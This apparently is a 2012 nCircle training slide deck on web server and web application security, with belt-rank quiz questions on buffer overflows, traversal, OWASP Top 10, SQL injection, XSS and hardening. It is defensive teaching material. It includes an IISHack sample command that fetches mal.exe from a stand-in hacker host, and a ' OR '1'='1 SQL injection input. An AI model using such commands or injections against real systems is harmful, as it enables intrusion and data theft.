© 2012 nCircle. All rights reserved.
Get Your Black Belt in Web Application Security26 April 2012
2 © 2012 nCircle. All rights reserved.
Web Server and Web Applications Security
3 © 2012 nCircle. All rights reserved.
Why Web Servers and Web Applications are hard to Defend
Why is attacking a web server or web applications one of the easiest attack methods?
– On the perimeter– Accessible by anyone on the Internet– Need to balance functionality with security– Port 80 and port 443 (can’t just block them)– Lack of security awareness of many
web developers– High level of traffic. Hard to distinguish an
attack from high volumes of legitimate traffic
4 © 2012 nCircle. All rights reserved.
Typical Attack Steps against a Web Server
1. Reconnaissance (passive)
2. Scanning and enumeration (active)
3. Gaining Access (exploit)
4. Escalation of privilege
5. Maintain access
6. Covering tracks and placing backdoors
5 © 2012 nCircle. All rights reserved.
Two Methods of Attack: The Web Server and Web Applications
• Web Server Attacks– Vulnerabilities in the web server or web server
configuration• Examples: Buffer Overflows, Traversals
• Web Application Attacks– Vulnerabilities in web applications
• Command Injection• XSS (Cross Site Scripting)
6 © 2012 nCircle. All rights reserved.
Ichi (one)
With respect to defending against web attacks what is problem with port 80 with respect to security?
a. It is the default TFTP port
b. It can be closed
c. It is not a well-known port
d. It can’t be blocked
Difficulty: Easy/Medium
7 © 2012 nCircle. All rights reserved.
Ni (two)
For an attack to work on a web server or a web application what does it need to have?
a. An exploit
b. A risk
c. A vulnerability
d. A configuration
Difficulty: Easy/Medium
8 © 2012 nCircle. All rights reserved.
Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
9 © 2012 nCircle. All rights reserved.
Web Server Attacks
10 © 2012 nCircle. All rights reserved.
Buffer Overflow Attack
A buffer overflow attack allows an attacker to overwrite code in the program’s execution path and thus take control of the program to execute the attacker’s code.
Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)
Example:
IISHack.exe Exploits the IIS http daemon buffer. Below is a sample:
c:\ iishack www.WebserverA.com 80www.hackserver.com/mal.exe
11 © 2012 nCircle. All rights reserved.
Web Server File System Traversal Attacks
• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
• Attack is initiated by inserting special characters in URLs, for example, ../ sequence.
• Encoding can be used to bypass Web server filtering.
12 © 2012 nCircle. All rights reserved.
San (three)
Which one of the following is NOT one of the typical attacks used against a web server like Apache?
a. ARP poisoning
b. Buffer overflow
c. Source disclosure
d. File system traversal
Difficulty: Easy/Medium
13 © 2012 nCircle. All rights reserved.
Shi (four)
A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
Difficulty: Easy/Medium
14 © 2012 nCircle. All rights reserved.
Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
15 © 2012 nCircle. All rights reserved.
Web Application Attacks
16 © 2012 nCircle. All rights reserved.
OWASP Top 10 Categories
A1-Injection
A2-Cross Site Scripting (XSS)
A3-Broken Authentication/Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A6-Security Misconfiguration
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Encryption
A10-Unvalidated Redirects and Forwards
OWASP Top 10 (2010 List) – www.owasp.org
17 © 2012 nCircle. All rights reserved.
Injection (Command Injection – OWASP A1)
• Occurs when untrusted data is sent to a command interpreter as part of a command or query.
• Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information
• Examples of command injection:– SQL Injection– Script Injection– Any web application that accepts input is potentially vulnerable
to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program
18 © 2012 nCircle. All rights reserved.
SQL Injection (Valid Data)
As an example the user enters Jill and Brown into two input fields on a web page
The program takes this input into the CustID variable and dynamically creates the query string :
‘SELECT * FROM accounts WHERE customerID =Jill_Brown’
The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown’s record as expected.
19 © 2012 nCircle. All rights reserved.
SQL Injection (Invalid Data)
The user enters Jane and Doe’ OR ‘1’=‘1 on the web page
The program takes this input and dynamically creates the query string :
‘SELECT * FROM accounts WHERE customerID =Jane_Doe’ OR ‘1’=‘1’
The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected
20 © 2012 nCircle. All rights reserved.
Defenses Against SQL Injection
• Prepared Statements (parameterized queries)• Stored Procedures• Escaping all user supplied input• Least privilege• White list input validation
Reference: OWASP SQL Injection Prevention Cheat
Sheet (www.owasp.org)
21 © 2012 nCircle. All rights reserved.
Cross Site Scripting (XSS – OWASP A2)
Untrusted data
• Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user’s browser via a web page request.
22 © 2012 nCircle. All rights reserved.
Defenses Against XSS
Primary defense: Escaping untrusted data
“Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.
Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations
Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content
Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations
Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
23 © 2012 nCircle. All rights reserved.
Broken Authentication and Session Management(OWASP A3)
• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity.
24 © 2012 nCircle. All rights reserved.
Defenses Against Broken Authentication and Session Management
• Secure management of session identifiers– Do not put session identifiers in the URL– Session IDs should have a timeout feature
• Do not allow the login process to execute from an unencrypted page
• Password Change Controls• Password use / strength / storage
• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
25 © 2012 nCircle. All rights reserved.
Go (five)
An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?
a. Sequence infiltration
b. SQL injection
c. Cookie poisoning
d. Hidden parameter exploit
Difficulty: Easy/Medium
26 © 2012 nCircle. All rights reserved.
Roku (six)
What is one of the defenses against SQL Injection?
a. Least Privilege
b. Black list input validation
c. Sanitization
d. Proxy manipulation
Difficulty: Easy/Medium
27 © 2012 nCircle. All rights reserved.
Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
28 © 2012 nCircle. All rights reserved.
Web Server and Web ApplicationDefense Tools
29 © 2012 nCircle. All rights reserved.
Web Server and Application Defense Tools (1 of 2)
• Scanning and mapping tools• Ping, Nping, Nmap, Amap, SuperScan, …
• Vulnerability and Web vulnerability scanners• Nikto, Wikto, Nessus, w3af, IP360, WebInspect,
Sentinel, WebApp360, Cenzic, Fortify, …
• Web proxy tools• WebScarab, Paros Proxy, Burp Proxy, …
• Web mapping/ripping tools• Black Widow, Wget, skipfish, …
• Communication/data transfer tools• Ncat, telnet, ftp, ….
• Exploits, Exploit Kits, and Exploit Frameworks• Program for a specific exploit• Pen Test frameworks: Metasploit, Core Impact, CANVAS
30 © 2012 nCircle. All rights reserved.
• Password cracking tools• John the Ripper, Cain and Abel, PRTK, ophcrack, …
• Web Source Code examination tools:• Instant Source, Firebug, ….
• SQL Injection Tools• BSQL Hacker, The Mole, sqlmap,
Pangolin, …
Web Server and Application Defense Tools (2 of 2)
31 © 2012 nCircle. All rights reserved.
Network Defense Tools (Protecting the Web Server)
• Routers• Firewalls (network layer)• Web Application Firewalls (application layer)• Web Application Proxies• Honeypots/Honeynets• Logging• Intrusion Detection/Prevention System (IDS/IPS)• Host-based Intrusion Detection (HIDS), e.g. file integrity
detection• Backups• Computer Forensic Tools
32 © 2012 nCircle. All rights reserved.
Web Server Protection
• Protect the Web Server • Vulnerability Assessment • Harden the Web Server
– Host (OS) – Web Server – Web Services
• Logging • Backups and recovery
33 © 2012 nCircle. All rights reserved.
Place the Web Sever in an Untrusted Zone
34 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (1 of 2)
• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)
• Host (OS) hardening
• Web Server hardening– Use tools like IIS Lockdown and URLscan– Harden each service you offer on your Web Server– Disable / remove anything you don’t use or need: accounts,
ports, services, accounts, plug-ins– Configuration settings– Permissions
35 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (2 of 2)
• Authentication and Access Control – File and directory permissions– Account password and lockout policies
• Logging and Audit Policies
• Vulnerability and Compliance Assessments– Vulnerability scanner– Web application vulnerability scanner– Configuration scanner– Audits for compliance assessments – Penetration testing / manual testing
36 © 2012 nCircle. All rights reserved.
Web Server Attack Countermeasures
• Buffer Overflow– Can be mitigated by conducting frequent scans for server
vulnerabilities
– Prompting acquiring and installing patches and service packs
– Implementing effective firewalls
– Applying web configuration lockdown utilities
• File System Traversal– Promptly apply patches and updates to the web server
– Restrict privileges to executable programs such as cmd.exe
– Set file and directory permissions
– Locate the system software on a different disk drive from the web site software and content directory.
37 © 2012 nCircle. All rights reserved.
Shichi (seven)
Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Password Cracking
Difficulty: Medium/Hard
38 © 2012 nCircle. All rights reserved.
Hachi (eight)
What is a good tool to help harden an IIS web server? (choose the best answer)
a. Cain and Abel
b. URLscan
c. ncat
d. WebScarab
Difficulty: Medium/Hard
39 © 2012 nCircle. All rights reserved.
Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan
40 © 2012 nCircle. All rights reserved.
Resources
• OWASP (Open Web Application Security Project) www.owasp.org
• NIST (National Institute of Standards and Technology) www.nist.gov
• SANS
www.sans.org • Web Application Security Consortium (WASC)
www.webappsec.org • SecTools.org
http://sectools.org
41 © 2012 nCircle. All rights reserved.
Questions?